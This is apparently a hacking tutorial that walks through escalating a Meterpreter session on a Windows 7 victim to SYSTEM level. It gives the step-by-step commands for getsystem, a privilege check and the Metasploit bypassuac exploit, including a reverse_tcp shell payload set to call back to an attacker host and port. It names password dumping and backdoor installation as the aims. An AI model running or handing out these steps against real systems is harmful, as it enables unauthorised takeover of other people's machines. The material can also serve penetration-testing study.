Sometimes when you trying to exploit a security hole and success gain an access to the target system, usually you only act as logged user and it’s not a local system account. In this tips and trick there’s a simple step to escalate your privilege when you’re inside meterpreter.
This picture below taken when hacked successfully gain an access using Payload create by me.
#meterpreter > getuid
When running getuid command, we know that we running as user that already logged in to the system but we didn’t act as system account. How do we do that to escalate our privilege to system account?.
The session only has limited user rights. This can severely limit actions you can perform on the remote system such as dumping passwords, manipulating the registry, installing backdoors, etc.
Fortunately, Metasploit has a Meterpreter script, ‘getsystem’, that will use a number of different techniques to attempt to gain SYSTEM level privileges on the remote system. There are also various other (local) exploits that can be used to also escalate privileges.
#meterpreter > use priv
# #meterpreter > getsystem
make use of the ‘getsystem’ command, if its not already loaded we will need to first load the ‘priv’ extension.
We will let Metasploit try to do the heavy lifting for us by running “getsystem” without any options. The script will attempt every method available to it, stopping when it succeeds.
There are situations where getsystem fails depending upon the operating system and exploiting method we are using.
In this above image we are only getting access to normal system user acount with less privileges, by executing post/windows/gather/win_privs command it will list the privilege of the current users logged in.
For this tutorial we are exploiting windows 7 as a victim’s machine and by executing a sysinfo command in your meterpeter shell you will get informations about your exploiting system.
#meterpreter > sysinfo
#meterpreter > run post/windows/gather/win_privs
If the getsystem code detects that it is running on a Windows 7 with UAC disabled and it is running as local admin it will run getsystem and it will use the read registry method.
When we executing getsystem command it will fail because the current logged user have not enough privilege to get admin roles and particularly in windows 7 UAC is defaulty enabled.
So we first try to bypass UAC enabled in windows 7, Luckily we have windows UAC bypass exploit in metasploit.
Meterpreter on Kali no longer recognized “run bypassuac” instead we had to use exploit/windows/local/bypassuac.
BypassUAC exploit that allows you to bypass Windows UAC in Windows Vista and Windows 7 both on x86 and x64 operating systems. This issue has still not been patched to-date and can still be exploited on the most recent operating systems.
For that we need to background the session, and manually try bypassuac exploit and load the session recently backgrounded and then exploit and execute getsystem to get admin privilege.
#meterpreter > background
#meterpreter > search uac
#meterpreter > use exploit/windows/local/bypassuac
I exploited this machine with the payload i created before, so try the method you used for exploiting the machine before.
#meterpreter > set payload windows/meterpreter/reverse_tcp
#meterpreter > set LHOST 192.168.31.20
#meterpreter > set LPORT 8080
#meterpreter > set SESSION 1
#meterpreter > exploit
After getting acess try getsystem command.
#meterpreter > getsystem